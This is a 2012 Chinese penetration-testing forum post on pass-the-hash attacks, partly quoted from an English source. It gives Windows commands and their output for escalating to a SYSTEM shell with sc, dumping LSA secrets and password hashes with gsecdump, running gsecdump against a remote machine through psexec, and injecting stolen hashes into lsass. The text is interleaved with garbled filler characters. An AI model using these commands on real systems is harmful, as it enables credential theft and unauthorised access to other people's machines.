中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]

作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:
& _9 `+ C0 X! f$ E4 I$ y% w
& s! |; m" \; m  q9 p5 g7 i3 sC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
' u+ t; g, L2 E8 f1 p' r0 F[SC] CreateService SUCCESS" G: y6 y6 Y( N. \* d

6 B0 d5 G; i& _% [, R0 sC:\>sc start shellcmdline3 U: T5 [# V$ L6 ~# u
[SC] StartService FAILED 1053:
4 e1 x0 x+ g; l# I3 V
; S, w; @7 `: \, O. TThe service did not respond to the start or control request in a timely fashion.
, c3 @$ i  D3 o$ F9 G( s+ N/ ~* T5 b
C:\>sc delete shellcmdline
1 t7 C( F" V4 Q3 P" E# i$ I) Q[SC] DeleteService SUCCESS
' y3 c! r1 h3 K! m5 i! O# ~; C, v( ^" E! u, @/ {2 R
------------1 r2 f8 `: `6 D; Y

" w, L( D; J0 s8 J) f: U) `/ jThen in the new DOS window:
" i/ ]2 r) ]% I9 ]% G- w5 k1 F; j5 Z% O% [' Y
Microsoft Windows XP [Version 5.1.2600]4 F# o7 s3 u' d* ~0 Z/ e
(C) Copyright 1985-2001 Microsoft Corp.
7 i4 l) A! N) \- |# \
9 K3 W4 U0 }) W& z( dC:\WINDOWS\system32>whoami" M( o3 d3 H" U( v5 S( J
NT AUTHORITY\SYSTEM2 ]! M  w. Q( U4 c% t$ m/ F- m

% K9 F0 g: L( [) a& MC:\WINDOWS\system32>gsecdump -h
0 E" ~- ~4 A$ f$ Agsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)  e! W4 U% _* i# N$ D' z
usage: gsecdump [options]
' t# H/ s) c* _3 E" G, v3 z& N: h+ d& W( j8 K- U
options:
# d. G& q5 |$ W-h [ --help ] show help
6 Y; y5 }% p. q9 q# d# X6 P" F-a [ --dump_all ] dump all secrets
# O% V  p6 E* x$ @) L( K9 j  R-l [ --dump_lsa ] dump lsa secrets' l# z6 r6 W0 p( d
-w [ --dump_wireless ] dump microsoft wireless connections6 z& z6 V8 C  V& I
-u [ --dump_usedhashes ] dump hashes from active logon sessions" y2 p. M! B% U2 P" b0 c
-s [ --dump_hashes ] dump hashes from SAM/AD4 k. s  ?( a* F4 C- `
6 Y9 D* V$ g% y! X
Although I like to use:2 P& x* B  Q$ n* j. e

7 `! \# H  W! Q$ H# F* H! mPsExec v1.83 - Execute processes remotely9 R( O$ G9 x& s" p. E: @
Copyright (C) 2001-2007 Mark Russinovich
0 w0 m2 V: a& p. cSysinternals - 链接标记[url]www.sysinternals.com[/url]8 ~8 Y) d0 B3 P& f2 _
: _$ p. f$ H/ P8 w% Q4 [
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 o1 W. s2 s3 W
6 ]5 N1 _5 r( V& s9 V
to get the hashes from active logon sessions of a remote system.
/ e  x1 y+ a* P6 [& t* q, O
' i: f& ?( c# j1 MThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 s  d9 k) P: ?

, }4 P4 t7 C2 d* y9 A( g/ a提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了." ?: C. j* y2 \1 {% F" q$ J; V4 V
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]5 P$ v( X7 E6 ]2 L
  t4 S3 `# X- i) _  [/ I
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。. [' W; s6 t5 r0 f( s% |( z2 [# A# P





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2